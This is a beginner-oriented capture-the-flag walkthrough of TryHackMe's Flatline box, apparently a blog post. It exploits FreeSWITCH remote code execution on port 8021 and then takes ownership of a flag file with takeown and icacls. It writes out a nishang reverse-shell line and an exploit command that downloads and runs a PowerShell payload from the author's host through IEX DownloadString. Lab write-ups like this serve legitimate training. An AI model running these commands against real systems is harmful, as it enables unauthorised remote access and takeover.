Flatline TryHackMe Walkthrough
introduction
Hello guys back again with another walkthrough. This time we’ll be tackling flatline from TryHackMe. The box was created by a user called Nekrotic. And the box is a really great for beginners who find it difficult in tackling widows boxes. It has just two steps from the initial foothold to getting root flag on the box. The box starts of by finding an open port 8021 running FreeSWITCH and on doing a little bit of googling we find that the service is vulnerable to remote code execution. After gaining a shell on the box we realize that we are already administrators on the box but we cannot read the root flag. we will use to windows commands to change the file ownership and read the root flag and the box is done. It was a really amazing box and without much say lets jump in
As always we’ll start off with a nmap scan of the box to find the ports that are open. Looking at the screenshot below we see that we have two open ports namely
- Remote desktop running on port 3389
- FreeSWITCH running on port 8021
Remote desktop (RDP) requires us to have valid credentials for us to access and right now we don’t even have a valid username for an account that exists on the box. Hence I decided to first begin by enumerating port 8021 running FreeSWITCH service. Doing a little google research we find a python exploit for that particular service
I downloaded the exploit and run it
The exploit required me to specify an IP Address and a command to be run after we connect to the service. First I tried pinging myself to see if actually the exploit would work. You might be asking why I didn’t try to get a reverse shell immediately and the reason is, a reverse shell may or may not work. Some systems are heavily guarded making reverse shells not to work and I could end up assuming that the exploit didn’t work because the service isn’t vulnerable but the reason might have been that the system was protected against getting reverse shells. A ping isn’t always considered malicious and hence there’s no reason it should be blocked
Hence next I specified a target and a command to run which in my case was a ping. On my box I did set up tcpdump to listen for any incoming ICMP packets
After running the exploit I got a ping request on my tcpsump listener
This confirms that the service is vulnerable to a remote code execution. The next step naturally is getting a shell on the system. What a shell will enable us to do is run system commands though the exploited service. I used nishang reverse shell since they are easy to use. On a fresh install of kali am not sure if nishang is installed by default if not just run the command
sudo apt install nishangTo install nishang on your system.
Next I copied nishang’s reverse shell file Invoke-PowerShellTcp.ps1 to my current working directory and made a few modifications
I changed the filename to be something a bit shorter shell.ps1
Next i added the following one liner at the bottom of the reverse shell
Invoke-PowerShellTcp -Reverse -IPAddress 10.8.2.58 -Port 9001Basically what I added was just my IP address and the port which I would use to listen for an incoming shell connection
I saved the reverse shell and started the a netcat listener and also a python we server
Then I executed the payload using the command below
The command that i ran was
python3 exploit.py 10.10.151.163 "cmd /c powershell IEX (New-Object Net.WebClient).DownloadString('http://10.8.2.58:8000/shell.ps1')"Going back to my netcat listener we had a shell on the box.
Sweet!!!. The next step is reading the user flag on the box
You can now submit it and get the points. There is a also a root.txt on the same folder. But when I tried receding it I got an access denied
The next steps is perform a privilege escalation. I downloaded winpeas to the box and ran it and found out that i was already an administrator since I was in the administrator’s group
I also found a NetNTLMv2 hash for the user Nekrotic
I tried cracking it with hashcat but it did not work. Being in the administrators group means we have access to all files. I decided to look online on how to take full ownership of a file I did not have access to and found a really nice article
We’ll use the two commands below to gain access to the root file
takeown /R /F *.*
icacls "root.txt" /q /c /t /grant Users:F
And now trying to read the root flag using the cat command in windows PowerShell it works we have the flag and can submit for the points
We can submit the flag and get the full points of the box. And the box is pretty much done. I hoped you enjoyed the box if so clap for me down below and don’t forget to follow me for any upcoming walkthroughs